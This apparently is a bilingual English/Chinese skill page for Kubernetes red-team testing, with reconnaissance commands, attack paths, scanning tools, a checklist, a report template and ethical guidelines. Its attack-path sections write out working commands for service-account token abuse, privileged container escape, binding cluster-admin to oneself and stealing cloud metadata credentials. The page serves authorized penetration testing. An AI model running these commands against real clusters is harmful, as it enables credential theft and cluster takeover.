Back to Details

k8s-security-redteam

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

Kubernetes Security Red Team

Kubernetes 安全红队测试

Perform offensive security testing of Kubernetes platforms including penetration testing, attack paths, and vulnerability assessment.
针对Kubernetes平台开展攻击性安全测试,包括渗透测试、攻击路径识别和漏洞评估。

Keywords

关键词

kubernetes, security, red team, penetration testing, pentest, attack, exploiting, exploit, privilege escalation, container escape, rbac, secrets, vulnerability, assessment, offensive, conducting, performing, running, testing, identifying, validating
kubernetes, security, red team, penetration testing, pentest, attack, exploiting, exploit, privilege escalation, container escape, rbac, secrets, vulnerability, assessment, offensive, conducting, performing, running, testing, identifying, validating

When to Use This Skill

何时使用此技能

  • Conducting authorized penetration tests
  • Performing security assessments
  • Running red team exercises
  • Testing security controls
  • Identifying attack paths
  • Validating hardening measures
IMPORTANT: Only use these techniques on systems you have explicit written authorization to test.
  • 执行授权渗透测试
  • 开展安全评估
  • 进行红队演练
  • 测试安全控制措施
  • 识别攻击路径
  • 验证加固措施
重要提示:仅可在你获得明确书面授权的系统上使用这些技术。

Related Skills

相关技能

  • k8s-security-hardening - What defenses to test
  • k8s-platform-tenancy - Tenant isolation to test
  • k8s-platform-operations - Incident response after findings
  • k8s-continual-improvement - Track security debt
  • k8s-namespace-troubleshooting - Diagnose exploited namespaces
  • Shared: RBAC Patterns - RBAC to audit
  • k8s-security-hardening - 需测试的防御措施
  • k8s-platform-tenancy - 需测试的租户隔离机制
  • k8s-platform-operations - 发现问题后的事件响应
  • k8s-continual-improvement - 跟踪安全债务
  • k8s-namespace-troubleshooting - 诊断已被攻陷的命名空间
  • Shared: RBAC Patterns - 需审计的RBAC配置

Quick Reference

快速参考

TaskCommand
Check permissions
kubectl auth can-i --list
Find privileged pods
kubectl get pods -A -o json | jq '.items[] | select(.spec.containers[].securityContext.privileged==true)'
List secrets
kubectl get secrets -A
Test anonymous access
kubectl --as=system:anonymous auth can-i --list
任务命令
检查权限
kubectl auth can-i --list
查找特权Pod
kubectl get pods -A -o json | jq '.items[] | select(.spec.containers[].securityContext.privileged==true)'
列出密钥
kubectl get secrets -A
测试匿名访问
kubectl --as=system:anonymous auth can-i --list

Attack Surface

攻击面

External

外部

  • Kubernetes API (TCP 6443)
  • Ingress controllers (TCP 80, 443)
  • NodePort services (TCP 30000-32767)
  • Exposed dashboards
  • Cloud metadata endpoints
  • Kubernetes API(TCP 6443)
  • Ingress控制器(TCP 80、443)
  • NodePort服务(TCP 30000-32767)
  • 暴露的仪表盘
  • 云元数据端点

Internal (from compromised pod)

内部(从已攻陷的Pod发起)

  • Service account tokens
  • Secrets in environment/volumes
  • Network connectivity
  • Mounted volumes
  • Cloud IMDS
  • 服务账户令牌
  • 环境变量/卷中的密钥
  • 网络连通性
  • 挂载的卷
  • 云IMDS

Reconnaissance

侦察

External

外部

bash
undefined
bash
undefined

Port scan

端口扫描

nmap -sV -p 6443,443,80,30000-32767 ${TARGET}
nmap -sV -p 6443,443,80,30000-32767 ${TARGET}

Check anonymous access

检查匿名访问

curl -k https://${API_SERVER}:6443/api/v1/namespaces
curl -k https://${API_SERVER}:6443/api/v1/namespaces

Test anonymous auth

测试匿名认证

kubectl --server=https://${API}:6443 --insecure-skip-tls-verify auth can-i --list
undefined
kubectl --server=https://${API}:6443 --insecure-skip-tls-verify auth can-i --list
undefined

Internal (from pod)

内部(从Pod内执行)

bash
undefined
bash
undefined

Current permissions

当前权限

kubectl auth can-i --list
kubectl auth can-i --list

SA token location

SA令牌位置

cat /var/run/secrets/kubernetes.io/serviceaccount/token
cat /var/run/secrets/kubernetes.io/serviceaccount/token

Enumerate

枚举资源

kubectl get namespaces kubectl get secrets -A kubectl get pods -A -o wide
undefined
kubectl get namespaces kubectl get secrets -A kubectl get pods -A -o wide
undefined

Attack Paths

攻击路径

1. Service Account Token Abuse

1. 服务账户令牌滥用

bash
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
APISERVER=https://kubernetes.default.svc

curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
  $APISERVER/api/v1/namespaces/default/secrets
bash
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
APISERVER=https://kubernetes.default.svc

curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
  $APISERVER/api/v1/namespaces/default/secrets

2. Privileged Container Escape

2. 特权容器逃逸

bash
undefined
bash
undefined

Mount host filesystem

挂载主机文件系统

mkdir /host && mount /dev/sda1 /host chroot /host
mkdir /host && mount /dev/sda1 /host chroot /host

Or nsenter

或使用nsenter

nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
undefined
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
undefined

3. RBAC Escalation

3. RBAC权限提升

bash
undefined
bash
undefined

Check dangerous permissions

检查危险权限

kubectl auth can-i escalate roles kubectl auth can-i bind clusterroles kubectl auth can-i impersonate users kubectl auth can-i create pods/exec
kubectl auth can-i escalate roles kubectl auth can-i bind clusterroles kubectl auth can-i impersonate users kubectl auth can-i create pods/exec

Escalate if can create rolebindings

若可创建角色绑定则进行权限提升

kubectl create rolebinding pwn --clusterrole=cluster-admin --user=$(whoami)
undefined
kubectl create rolebinding pwn --clusterrole=cluster-admin --user=$(whoami)
undefined

4. Cloud Metadata Exploitation

4. 云元数据利用

AWS:
bash
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
GCP:
bash
curl -H "Metadata-Flavor: Google" \
  http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token
Azure:
bash
curl -H "Metadata: true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
AWS:
bash
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
GCP:
bash
curl -H "Metadata-Flavor: Google" \
  http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token
Azure:
bash
curl -H "Metadata: true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

Cloud-Specific Attacks

云平台特定攻击

AWS EKS

AWS EKS

  • IRSA token theft from projected SA volumes
  • Node IAM role abuse via IMDS
  • aws-auth ConfigMap manipulation
  • EKS cluster role misconfiguration
  • 从投影SA卷窃取IRSA令牌
  • 通过IMDS滥用节点IAM角色
  • 操纵aws-auth ConfigMap
  • EKS集群角色配置错误

GCP GKE

GCP GKE

  • Workload Identity token theft
  • Metadata concealment bypass
  • GKE node service account abuse
  • Anthos Config Management exploitation
  • 窃取工作负载身份令牌
  • 绕过元数据隐藏机制
  • 滥用GKE节点服务账户
  • 利用Anthos配置管理

Azure AKS

Azure AKS

  • Azure AD Pod Identity abuse
  • Managed Identity exploitation
  • AKS RBAC misconfiguration
  • Key Vault access via MI
  • 滥用Azure AD Pod Identity
  • 利用托管身份
  • AKS RBAC配置错误
  • 通过MI访问Key Vault

Vulnerability Assessment Tools

漏洞评估工具

Installation

安装

bash
undefined
bash
undefined

kubescape

kubescape

brew install kubescape
brew install kubescape

trivy (includes cluster scanning, image scanning, and k8s misconfiguration detection)

trivy(包含集群扫描、镜像扫描和K8s配置错误检测)

brew install trivy

> **Note**: kube-hunter (formerly by Aqua Security) has been deprecated and is no longer maintained. Use `trivy k8s` for equivalent cluster vulnerability scanning.
brew install trivy

> **注意**:kube-hunter(原由Aqua Security开发)已被弃用,不再维护。请使用`trivy k8s`进行等效的集群漏洞扫描。

Running Scans

运行扫描

bash
undefined
bash
undefined

kubescape

kubescape

kubescape scan framework nsa,mitre
kubescape scan framework nsa,mitre

trivy cluster scan (replaces kube-hunter)

trivy集群扫描(替代kube-hunter)

trivy k8s --report summary cluster
trivy k8s --report summary cluster

trivy targeted scan

trivy定向扫描

trivy k8s --namespace ${NAMESPACE} --report all
undefined
trivy k8s --namespace ${NAMESPACE} --report all
undefined

Testing Checklist

测试检查清单

Authentication

认证

  • Anonymous API access
  • Default dashboard credentials
  • Weak service account tokens
  • Missing token expiration
  • API匿名访问
  • 仪表盘默认凭据
  • 弱服务账户令牌
  • 缺少令牌过期机制

Authorization

授权

  • Overly permissive RBAC
  • Privilege escalation paths
  • Cross-namespace access
  • Wrong secret access
  • 权限过度宽松的RBAC
  • 权限提升路径
  • 跨命名空间访问
  • 错误的密钥访问权限

Network

网络

  • Missing network policies
  • Unrestricted pod traffic
  • Metadata endpoint access
  • External exposure
  • 缺少网络策略
  • Pod流量不受限制
  • 元数据端点可访问
  • 外部暴露风险

Container

容器

  • Privileged containers
  • Host namespace access
  • Writable root filesystem
  • Capabilities not dropped
  • 特权容器
  • 主机命名空间访问
  • 根文件系统可写
  • 未丢弃危险权限

MITRE ATT&CK Mapping

MITRE ATT&CK 映射

TechniqueIDTest
Valid AccountsT1078Token leakage
Container AdminT1609kubectl exec
Escape to HostT1611Privileged abuse
Credential AccessT1555Secret enumeration
Lateral MovementT1021Pod-to-pod access
技术ID测试项
有效账户T1078令牌泄露
容器管理员T1609kubectl exec
逃逸到主机T1611特权滥用
凭据获取T1555密钥枚举
横向移动T1021Pod间访问

Reporting

报告

Finding Template

发现模板

markdown
undefined
markdown
undefined

[CRITICAL/HIGH/MEDIUM/LOW] Finding Title

[CRITICAL/HIGH/MEDIUM/LOW] 发现标题

Description: What the vulnerability is
Impact: What an attacker could do
Evidence:
  • Commands and output
Affected Resources:
  • Specific resources
Remediation:
  1. Immediate fix
  2. Long-term solution
References:
  • CIS control
  • MITRE technique
undefined
描述:漏洞具体内容
影响:攻击者可利用此漏洞执行的操作
证据:
  • 执行的命令及输出
受影响资源:
  • 具体资源
修复建议:
  1. 即时修复方案
  2. 长期解决方案
参考:
  • CIS控制项
  • MITRE技术
undefined

Common Mistakes

常见错误

MistakeWhy It FailsInstead
Testing production clusters without written scope documentCauses unplanned outages; legal and compliance exposureGet explicit written authorization defining scope, timing, and boundaries
Exploiting a vulnerability without documenting the stepsFinding cannot be reproduced or verified; remediation team cannot confirm fixRecord exact commands and outputs as you go
Leaving privileged pods or RoleBindings after testingAttackers can reuse your test artifacts as real attack vectorsClean up all artifacts immediately after each test phase
Assuming RBAC is the only access controlNetwork-level access, cloud IAM, and metadata endpoints bypass RBAC entirelyTest all attack surfaces: RBAC, network, cloud IMDS, runtime
Running scans at peak traffic hoursScanning generates load; may trigger alerts and degrade user experienceSchedule intensive scans during maintenance windows
错误行为失败原因正确做法
未获得书面范围文档就测试生产集群导致意外停机;面临法律和合规风险获取明确的书面授权,定义测试范围、时间和边界
利用漏洞但未记录步骤发现结果无法复现或验证;修复团队无法确认漏洞已修复随时记录精确的命令和输出
测试后遗留特权Pod或RoleBindings攻击者可将你的测试工件用作真实攻击向量每个测试阶段结束后立即清理所有工件
假设RBAC是唯一的访问控制机制网络级访问、云IAM和元数据端点可完全绕过RBAC测试所有攻击面:RBAC、网络、云IMDS、运行时
在流量高峰时段运行扫描扫描会产生负载;可能触发警报并降低用户体验在维护窗口安排密集扫描

Ethical Guidelines

道德准则

  1. Written authorization required before testing
  2. Scope clearly defined and respected
  3. No production data exfiltration
  4. Report all findings responsibly
  5. Clean up any artifacts created
  6. Document everything for reproducibility
  1. 书面授权:测试前必须获得书面授权
  2. 明确范围:严格遵守已定义的测试范围
  3. 禁止数据泄露:不得泄露生产数据
  4. 负责任报告:如实报告所有发现
  5. 清理工件:清理所有测试期间创建的工件
  6. 完整记录:记录所有操作以便复现